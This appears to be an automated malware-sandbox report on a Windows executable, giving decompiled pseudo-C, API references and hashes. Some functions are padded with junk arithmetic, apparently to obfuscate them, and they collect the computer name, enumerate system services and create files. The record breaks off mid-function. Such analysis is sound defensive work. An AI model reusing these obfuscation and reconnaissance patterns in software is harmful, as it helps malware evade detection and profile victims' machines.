0x00f75646
0x00f7564b
0x00f75654
0x00f7565e
0x00f75663
0x00f7566d
0x00f75677
0x00f7567c
0x00f75686
0x00f75690
0x00f756aa
0x00f756b2
0x00f756bf
0x00f756cb
0x00f756d6
0x00f756e7
0x00f756f3
0x00f756f5
0x00f756fd
0x00f75708
0x00f7570f
0x00f75711
0x00f75719
0x00f7571f
0x00f75725
0x00f75728
0x00f75748
0x00f7574e
0x00f75755
0x00f7575e
0x00f7575e
0x00f75760
0x00f7572a
0x00f7572a
0x00f75731
0x00f75740
0x00f75740
0x00f7576e
0x00f75773
0x00f75779
0x00f75784
0x00f7578f
0x00f75796
0x00f7579f
0x00f757a2
0x00f757a5
0x00f757b0
0x00f757b6
0x00f757bb
0x00f757be
0x00f757c1
0x00f757cd
0x00f757d6
0x00f757d9
0x00f757df
0x00f757e1
0x00f757e6
0x00f757e8
0x00f757ef
0x00f757ff
0x00f75805
0x00f75813
0x00f7581c
0x00f7581f
0x00f75822
0x00f75807
0x00f75807
0x00f75807
0x00f75805
0x00f7582e
0x00f75849
0x00f75854
0x00f75871
0x00f7587c
0x00f75884
0x00f75896
0x00f7589f
0x00f758a4
0x00f758b1
0x00f758c4
0x00f758c7
0x00f758ca
0x00f758cd
0x00f758d0
0x00f758d3
0x00f758d6
0x00f758d9
0x00f758dc
0x00f758df
0x00f758e8
0x00f758f8
0x00f754b5
0x00f754bc
0x00f754c4
0x00f754c7
0x00f754c9
0x00f754d0
0x00f754d0
0x00f754d2
0x00f754d5
0x00f754d6
0x00f754d6
0x00f754dd
0x00f754e2
0x00000000
0x00f754e2

APIs

Part of subcall function 00F7D76C: _malloc.LIBCMT ref: 00F7D786

GetComputerNameA.KERNEL32(?,?), ref: 00F754AB
_memset.LIBCMT ref: 00F75595

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: ComputerName_malloc_memset
String ID:
API String ID: 928949221-0
Opcode ID: c4a621a4512069d9369b7003dccf11214df6ebaf177859996fac488d974e1a6b
Instruction ID: cf4ca450ae546df9eda7fa5f94d97ec23f9b360a5f28201e152d2859762c7d76
Opcode Fuzzy Hash: c4a621a4512069d9369b7003dccf11214df6ebaf177859996fac488d974e1a6b
Instruction Fuzzy Hash: CED1AFB1C0060CDFDB04EFA4FC91AED7B74FB5A700F14806AE49AA71A1EB741518EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F7DC8D Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F7DC8D(int _a4) {

				E00F7DC62(_a4);
				ExitProcess(_a4);
			}

0x00f7dc95
0x00f7dc9e

APIs

___crtCorExitProcess.LIBCMT ref: 00F7DC95

Part of subcall function 00F7DC62: GetModuleHandleW.KERNEL32(mscoree.dll,?,00F7DC9A,00000000,?,00F7CBF3,000000FF,0000001E,00000001,00000000,00000000,?,00F91B2D,00000000,00000001,00000000), ref: 00F7DC6C
Part of subcall function 00F7DC62: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F7DC7C

ExitProcess.KERNEL32 ref: 00F7DC9E

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 64a92c2f0264d95c2362e350c938d968c0ccb01d3b819ac7f7301e6cc1744e5a
Instruction ID: 68079458ef8af2058233d3aec7807c22f844df24f64364a30f6f677353c5a5e2
Opcode Fuzzy Hash: 64a92c2f0264d95c2362e350c938d968c0ccb01d3b819ac7f7301e6cc1744e5a
Instruction Fuzzy Hash: 1DB0923100010CBBCB022F16DC0E8497F2AEF827A0B50C021F94C0A031DFB2EE92EA82

Uniqueness

Uniqueness Score: -1.00%

Function 00F6DB70 Relevance: 1.6, APIs: 1, Instructions: 93
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00F6DB70(void* __eflags, long long __fp0) {
				signed char _v8;
				long long _v12;
				char _v292;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				signed char _t20;
				void _t26;
				void* _t29;
				void _t31;
				signed int _t33;
				void* _t41;
				signed int _t42;
				intOrPtr _t44;
				intOrPtr _t45;
				void* _t48;
				void* _t55;
				long long _t68;

				_t68 = __fp0;
				_t63 = __eflags;
				 *0xfae154 = 0xffffdfcd;
				E00F76330(__eflags,  &_v292);
				_t13 = E00F6CF90(_t63, _t68, 0x23fb, 0x1f);
				_t29 = _t13;
				_t41 = _t29;
				do {
					_t26 =  *_t29;
					_t29 = _t29 + 1;
				} while (_t26 != 0);
				_t55 = _t41;
				_t42 = _t29 - _t41;
				_t48 =  &_v292 - 1;
				do {
					_t31 =  *(_t48 + 1);
					_t48 = _t48 + 1;
				} while (_t31 != 0);
				_t33 = _t42 >> 2;
				_t14 = memcpy(_t48, _t55, _t33 << 2);
				memcpy(_t55 + _t33 + _t33, _t55, _t42 & 0x00000003);
				E00F76570(0x1f, _t14);
				_t17 = CreateFileA( &_v292, 0xc0000000, 0, 0, 2, 0, 0); // executed
				 *0xfafc7c = _t17;
				_t18 =  *0xfae340; // 0x1a61
				_v8 = _t18 + 0x463b71b6;
				asm("fild dword [ebp-0x4]");
				 *0xfae148 = _t68;
				if( *0xfafc7c != 0xffffffff) {
					_t44 =  *0xfae2f8; // 0xb1ed
					_t20 = _t44 + 0xb8a7e41;
					_v8 = _t20;
					asm("fild dword [ebp-0x4]");
					_v12 = _t68;
					asm("fsubr qword [ebp-0x8]");
					_v12 =  *0xfae554;
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					__eflags = _t20 & 0x00000001;
					if((_t20 & 0x00000001) == 0) {
						_t45 =  *0xfae33c; // 0xc716
						 *0xfae4ec =  *0xfae4ec + _t45 + 0xb6ddc2c4;
						__eflags =  *0xfae4ec;
					}
					return 0;
				} else {
					 *0xfae438 =  *0xfae438 -  *0xfa79ec;
					return 2;
				}
			}

0x00f6db70
0x00f6db70
0x00f6db85
0x00f6db8b
0x00f6db97
0x00f6dba0
0x00f6dba3
0x00f6dba6
0x00f6dba6
0x00f6dba8
0x00f6dba9
0x00f6dbb5
0x00f6dbb7
0x00f6dbb9
0x00f6dbc0
0x00f6dbc0
0x00f6dbc3
0x00f6dbc4
0x00f6dbca
0x00f6dbcd
0x00f6dbd7
0x00f6dbd9
0x00f6dbf7
0x00f6dbfd
0x00f6dc02
0x00f6dc18
0x00f6dc1d
0x00f6dc21
0x00f6dc27
0x00f6dc44
0x00f6dc4e
0x00f6dc53
0x00f6dc58
0x00f6dc5b
0x00f6dc64
0x00f6dc67
0x00f6dc76
0x00f6dc79
0x00f6dc7b
0x00f6dc7e
0x00f6dc80
0x00f6dc8f
0x00f6dc8f
0x00f6dc8f
0x00f6dc9a
0x00f6dc29
0x00f6dc3a
0x00f6dc43
0x00f6dc43

APIs

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000,00000000,74CB4EE0), ref: 00F6DBF7

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: CreateFile_malloc
String ID:
API String ID: 3342272417-0
Opcode ID: d4c957bbd9953b4641b64c036057de329e74645825253fad2af8e3c07066d853
Instruction ID: 59d2fe5f49df6146688a693183b8ea517f1e851b44d5f47d590dfa6b55a6f735
Opcode Fuzzy Hash: d4c957bbd9953b4641b64c036057de329e74645825253fad2af8e3c07066d853
Instruction Fuzzy Hash: 463169B4A0070DD7DB14DF24FC457F97BB8FB9A310F1441A9E884972D1E6300954EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F9C120 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00F9C120(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0xfb09e0, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0xfb1014;
					if( *0xfb1014 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00F7FDDD(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00F7FA66(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x00f9c125
0x00f9c12a
0x00f9c147
0x00f9c14c
0x00f9c14e
0x00f9c150
0x00f9c152
0x00f9c152
0x00f9c152
0x00000000
0x00f9c15a
0x00f9c163
0x00f9c169
0x00f9c16b
0x00000000
0x00000000
0x00f9c19f
0x00f9c1a1
0x00000000
0x00f9c16d
0x00f9c16d
0x00f9c174
0x00f9c192
0x00f9c195
0x00f9c197
0x00f9c199
0x00f9c199
0x00f9c176
0x00f9c177
0x00f9c17d
0x00f9c17f
0x00f9c153
0x00f9c153
0x00f9c155
0x00f9c158
0x00000000
0x00000000
0x00000000
0x00000000
0x00f9c181
0x00f9c181
0x00f9c184
0x00f9c186
0x00f9c188
0x00f9c188
0x00f9c18e
0x00f9c18e
0x00f9c17f
0x00000000
0x00f9c12c
0x00f9c130
0x00f9c133
0x00f9c136
0x00000000
0x00f9c138
0x00f9c13d
0x00f9c146
0x00f9c146
0x00f9c136
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00F91B77,00000000,00000000,00000000,00000000,00000000,?,00F7FFA4,00000001,00000214,?,00F79D4C), ref: 00F9C163

Part of subcall function 00F7FA66: __getptd_noexit.LIBCMT ref: 00F7FA66

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5655b941c6c2e8fe13434131cd54c5bce5dbd6efbfc7774827eccfc024d803a9
Instruction ID: ebd2a31d15005226c0397f5e8b6cfc2e9f63484ac3ea05b41137d5aa9c007692
Opcode Fuzzy Hash: 5655b941c6c2e8fe13434131cd54c5bce5dbd6efbfc7774827eccfc024d803a9
Instruction Fuzzy Hash: 2801B131B01215ABFF289F24DC54B6A3355AB817B0F008629E819CB1A2DB34DC80E6D4

Uniqueness

Uniqueness Score: -1.00%

Function 00F7DF62 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00F7DF62(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00F7DE22(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}

0x00f7df67
0x00f7df69
0x00f7df6b
0x00f7df6e
0x00f7df77

APIs

_doexit.LIBCMT ref: 00F7DF6E

Part of subcall function 00F7DE22: __lock.LIBCMT ref: 00F7DE30
Part of subcall function 00F7DE22: RtlDecodePointer.NTDLL(00FABAD0,00000020,00F7DF89,00000000,00000001,00000000,?,00F7DFC9,000000FF,?,00F8280C,00000011,00000000,?,00F7FF0F,0000000D), ref: 00F7DE6C
Part of subcall function 00F7DE22: DecodePointer.KERNEL32(?,00F7DFC9,000000FF,?,00F8280C,00000011,00000000,?,00F7FF0F,0000000D), ref: 00F7DE7D
Part of subcall function 00F7DE22: DecodePointer.KERNEL32(-00000004,?,00F7DFC9,000000FF,?,00F8280C,00000011,00000000,?,00F7FF0F,0000000D), ref: 00F7DEA3
Part of subcall function 00F7DE22: DecodePointer.KERNEL32(?,00F7DFC9,000000FF,?,00F8280C,00000011,00000000,?,00F7FF0F,0000000D), ref: 00F7DEB6
Part of subcall function 00F7DE22: DecodePointer.KERNEL32(?,00F7DFC9,000000FF,?,00F8280C,00000011,00000000,?,00F7FF0F,0000000D), ref: 00F7DEC0

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: DecodePointer$__lock_doexit
String ID:
API String ID: 3343572566-0
Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction ID: 3162419b18de05ea5cea14e9ed2aef844bd127a1d689bc9c22c5a23f8e20325a
Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction Fuzzy Hash: 73B012325C030C33DA212942EC03F063F1D8BE0B60F644021FA0C1D1E1E9A7FA6191CA

Uniqueness

Uniqueness Score: -1.00%

Function 00F7FE05 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,00F9178D,00FB09E8,00000314,00000000,?,?,?,?,?,00F7FCD6,00FB09E8,Microsoft Visual C++ Runtime Library,00012010), ref: 00F7FE07

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 4699ec9fa125377af69081c3097b3973138cc5465e35b53198d9c946d4aedc22
Instruction ID: cb0b290c36ff4e44f12808a58c2f112f45b5df68dea33b6225a0809e7fbcadac
Opcode Fuzzy Hash: 4699ec9fa125377af69081c3097b3973138cc5465e35b53198d9c946d4aedc22
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F706A0 Relevance: 12.2, APIs: 8, Instructions: 194
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F706A0(void* __edi, intOrPtr _a4) {
				int _v8;
				signed char _v12;
				signed long long _v16;
				struct _ENUM_SERVICE_STATUS* _v20;
				signed long long _v24;
				intOrPtr _v28;
				signed long long _v32;
				int _v36;
				int _v40;
				struct _ENUM_SERVICE_STATUS _v76;
				char _v77;
				char _v588;
				void* __esi;
				signed char _t43;
				intOrPtr _t45;
				void* _t46;
				int _t51;
				long _t52;
				intOrPtr _t54;
				signed char _t56;
				void* _t61;
				intOrPtr _t66;
				void* _t67;
				void* _t68;
				intOrPtr _t70;
				signed int _t71;
				intOrPtr _t73;
				struct _ENUM_SERVICE_STATUS* _t75;
				intOrPtr _t79;
				signed int _t80;
				void* _t88;
				int _t90;
				struct _ENUM_SERVICE_STATUS* _t95;
				intOrPtr* _t96;
				void* _t97;
				void* _t100;
				intOrPtr* _t107;
				signed long long _t115;
				long long _t121;

				_t88 = __edi;
				 *0xfae2a8 =  *0xfae2a8 -  *0xfa7fe8;
				_v36 = 0;
				_t115 =  *0xfae1c8 -  *0xfa7fe0;
				_v77 = 0;
				 *0xfae1c8 = _t115;
				_t67 = OpenSCManagerA(0, 0, 0x80000000);
				_v12 = _t67;
				if(_t67 == 0) {
					_t93 = E00F6CF90(__eflags, _t115, 0x3f97, 0x14);
					_t43 = E00F70980(_a4, _t115, _t42);
					asm("fsubr qword [0xfa7fc0]");
					_v16 =  *0xfae3d8 -  *0xfa7fb8;
					asm("fcomp qword [ebp-0xc]");
					asm("fnstsw ax");
					asm("fld1");
					_t121 =  *0xfae3c0 - st0;
					asm("fxch st0, st1");
					 *0xfae3c0 = _t121;
					asm("fsubr qword [0xfae3d8]");
					 *0xfae3d8 = _t121;
					__eflags = _t43 & 0x00000041;
					if((_t43 & 0x00000041) == 0) {
						_t71 =  *0xfae26c; // 0xdae
						_t79 =  *0xfae5b4; // 0x1cd4719a
						_t80 = _t79 + _t71 + 0xe40cc7f6;
						__eflags = _t80;
						 *0xfae26c = _t80;
					}
					E00F76570(0x14, _t93);
				} else {
					_t81 =  &_v40;
					_t51 = EnumServicesStatusA(_t67, 0x30, 3,  &_v76, 0x24,  &_v40,  &_v8,  &_v36);
					_t94 = _t51;
					_t52 = GetLastError();
					if(_t51 == 0 || _t52 == 0xea) {
						_push(_t88);
						_t90 = _v40 + 0x24;
						_t95 = E00F7CBC4(_t81, _t90, _t94, _t90);
						_t100 = _t97 + 4;
						_v20 = _t95;
						if(_t95 != 0) {
							EnumServicesStatusA(_t67, 0x30, 3, _t95, _t90,  &_v40,  &_v8,  &_v36);
							_t68 = 0;
							if(_v8 > 0) {
								_t96 = _t95 + 0xc;
								_t107 = _t96;
								do {
									_t61 = E00F6CF90(_t107, _t115, 0x255a, 0x10);
									_push( *((intOrPtr*)(_t96 - 8)));
									_push( *((intOrPtr*)(_t96 - 0xc)));
									E00F7E0C2( &_v588, 0x1ff, _t61,  *_t96);
									E00F76570(0x10, _t61);
									_t100 = _t100 + 0x28;
									E00F70980(_a4, _t115,  &_v588);
									_t66 =  *0xfae0e8; // 0x80000000
									_v28 = _t66;
									asm("fild dword [ebp-0x18]");
									_t68 = _t68 + 1;
									_t96 = _t96 + 0x24;
									_v32 = _t115;
									_v32 =  *0xfae338 + _v32 -  *0xfa7fdc;
									_t115 =  *0xfae560 * _v32;
									 *0xfae560 = _t115;
								} while (_t68 < _v8);
								_t95 = _v20;
							}
							_t75 =  *0xfae1fc; // 0x80000000
							_v20 = _t75;
							asm("fild dword [ebp-0x10]");
							asm("fsubp st1, st0");
							_v24 =  *0xfae400;
							_v24 =  *0xfae344 + _v24;
							_t115 =  *0xfae1a8 * _v24;
							 *0xfae1a8 = _t115;
							 *0xfae1fc =  *0xfae1fc + 1;
							E00F7CB4B(_t95);
							_t67 = _v12;
							 *0xfae140 = ( *0xfae140 & 0x0000ffff) - 0x2fe8c243;
						}
						 *0xfae46c =  *0xfae46c - 1;
						_t54 =  *0xfae46c; // 0x0
						_t73 =  *0xfae4fc; // 0xc1ce
						_t56 = _t73 + _t54 - 0x5a0da30b;
						_v12 = _t56;
						asm("fild dword [ebp-0x8]");
						_v16 = _t115;
						asm("fcomp qword [ebp-0xc]");
						asm("fnstsw ax");
						if((_t56 & 0x00000041) == 0) {
							 *0xfae0b4 =  *0xfae4d8 -  *0xfa7fd0 +  *0xfa7fc8;
						}
						CloseServiceHandle(_t67);
					}
				}
				_t45 =  *0xfae45c; // 0x386cf1b3
				_t70 =  *0xfae4ac; // 0xea843027
				_t46 = _t45 + _t70;
				 *0xfae478 =  *0xfae478 + _t46;
				 *0xfae45c =  *0xfae45c - 1;
				return _t46;
			}

0x00f706a0
0x00f706be
0x00f706c4
0x00f706d3
0x00f706d9
0x00f706dd
0x00f706e9
0x00f706eb
0x00f706f0
0x00f708bd
0x00f708c0
0x00f708cb
0x00f708d7
0x00f708e6
0x00f708e9
0x00f708f1
0x00f708f3
0x00f708f5
0x00f708f7
0x00f708fd
0x00f70903
0x00f70909
0x00f7090c
0x00f7090e
0x00f70915
0x00f70923
0x00f70923
0x00f70925
0x00f70925
0x00f7092f
0x00f706f6
0x00f706fe
0x00f7070d
0x00f70713
0x00f70715
0x00f7071d
0x00f7072a
0x00f7072e
0x00f70737
0x00f70739
0x00f7073c
0x00f70741
0x00f7075a
0x00f70760
0x00f70765
0x00f7076b
0x00f7076b
0x00f70770
0x00f70777
0x00f70782
0x00f70783
0x00f70796
0x00f7079e
0x00f707a6
0x00f707b0
0x00f707b5
0x00f707ba
0x00f707bd
0x00f707c0
0x00f707c1
0x00f707c4
0x00f707d6
0x00f707df
0x00f707e2
0x00f707e8
0x00f707ed
0x00f707ed
0x00f707f6
0x00f707fc
0x00f707ff
0x00f70803
0x00f70805
0x00f70811
0x00f7081a
0x00f7081d
0x00f70823
0x00f70829
0x00f70835
0x00f70841
0x00f70841
0x00f70848
0x00f7084f
0x00f70855
0x00f70860
0x00f70867
0x00f7086b
0x00f7086e
0x00f7087d
0x00f70880
0x00f70885
0x00f70899
0x00f70899
0x00f708a0
0x00f708a0
0x00f7071d
0x00f70937
0x00f7093c
0x00f70942
0x00f70944
0x00f7094a
0x00f70955

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,00000000), ref: 00F706E3
EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 00F7070D
GetLastError.KERNEL32 ref: 00F70715
_malloc.LIBCMT ref: 00F70732
EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 00F7075A
__snprintf.LIBCMT ref: 00F70796
_free.LIBCMT ref: 00F70829
CloseServiceHandle.ADVAPI32(00000000), ref: 00F708A0

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService__snprintf_free_malloc
String ID:
API String ID: 3403677689-0
Opcode ID: 345dba52e4e9d4891ba40352197dd64908919e766045af0f48c4c365a6918c89
Instruction ID: 94e49827cfc493df18c60b36c6df83923d465a724a642af690a1909de53de3ca
Opcode Fuzzy Hash: 345dba52e4e9d4891ba40352197dd64908919e766045af0f48c4c365a6918c89
Instruction Fuzzy Hash: 867108B1D0061DEBDB00DF90FC84BEE7B78FF8A710F144455E984622A5DB705A64EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F6D840 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 214
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F6D840(long long __fp0) {
				char* _v8;
				long long _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v300;
				struct _WIN32_FIND_DATAA _v620;
				intOrPtr _t43;
				intOrPtr* _t48;
				char* _t50;
				void* _t51;
				unsigned int _t52;
				void* _t56;
				short _t61;
				void* _t64;
				unsigned int _t65;
				signed int _t66;
				short _t69;
				void _t74;
				void* _t75;
				intOrPtr _t77;
				intOrPtr _t80;
				void* _t81;
				void _t82;
				signed int _t84;
				void* _t89;
				void _t91;
				signed int _t93;
				void* _t101;
				void _t102;
				signed int _t104;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void _t114;
				void* _t115;
				signed int _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				void _t119;
				void* _t124;
				void* _t130;
				void* _t137;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t154;
				void* _t157;
				long long _t179;
				long long _t183;
				long long _t187;
				long long _t196;

				_t43 =  *0xfae38c; // 0x93fc1fed
				_v16 = _t43;
				asm("fild dword [ebp-0xc]");
				_v12 = __fp0;
				_t77 =  *0xfae4a8; // 0x0
				_t179 =  *0xfae1e4 + _v12;
				_v16 = _t77;
				_v12 = _t179;
				asm("fild dword [ebp-0xc]");
				asm("fsubr qword [ebp-0x8]");
				_v12 = _t179;
				 *0xfae324 =  *0xfae324 + _v12;
				 *0xfae4a8 =  *0xfae4a8 + 1;
				asm("fld1");
				asm("faddp st1, st0");
				if( *0xfb0478 == 0) {
					 *0xfae544 = 0xffffd793;
					E00F6A010(0x104,  &_v300);
					_t111 =  *0xfae1c0; // 0xa814
					 *0xfae03c =  *0xfae03c + 0x9eda8769 - _t111;
					_t48 =  &_v300;
					_t151 = _t150 + 8;
					 *0xfae1c0 =  *0xfae1c0 + 1;
					_t112 = _t48 + 1;
					do {
						_t80 =  *_t48;
						_t48 = _t48 + 1;
					} while (_t80 != 0);
					_t183 =  *0xfae190;
					_t113 =  *0xfae47c; // 0xd2bf0293
					_v12 = _t183;
					_v16 = _t113;
					asm("fild dword [ebp-0xc]");
					asm("fsubr qword [ebp-0x8]");
					_v12 = _t183;
					 *0xfae1b0 =  *0xfae3e0 + _v12;
					_t187 =  *0xfae3e0 +  *0xfa75c8;
					 *0xfae3e0 = _t187;
					Sleep(0x3e8);
					_t50 = _t149 + _t48 - _t112 - 0x128;
					_v8 = _t50;
					 *_t50 = 0;
					_t51 =  *0xfb0494; // 0x2731088
					_t81 = _t51;
					do {
						_t114 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t114 != 0);
					_t52 = _t51 - _t81;
					_t146 = _t81;
					_t124 =  &_v300 - 1;
					do {
						_t82 =  *(_t124 + 1);
						_t124 = _t124 + 1;
					} while (_t82 != 0);
					_t84 = _t52 >> 2;
					memcpy(_t146 + _t84 + _t84, _t146, memcpy(_t124, _t146, _t84 << 2) & 0x00000003);
					_t89 = E00F6CF90(memcpy(_t124, _t146, _t84 << 2) & 0x00000003, _t187, 0x3bc, 2);
					_t154 = _t151 + 0x20;
					_t115 = _t89;
					do {
						_t74 =  *_t89;
						_t89 = _t89 + 1;
					} while (_t74 != 0);
					_t147 = _t115;
					_t116 = _t89 - _t115;
					_t130 =  &_v300 - 1;
					do {
						_t91 =  *(_t130 + 1);
						_t130 = _t130 + 1;
					} while (_t91 != 0);
					_t93 = _t116 >> 2;
					_t56 = memcpy(_t130, _t147, _t93 << 2);
					memcpy(_t147 + _t93 + _t93, _t147, _t116 & 0x00000003);
					E00F76570(2, _t56);
					_t157 = _t154 + 0x20;
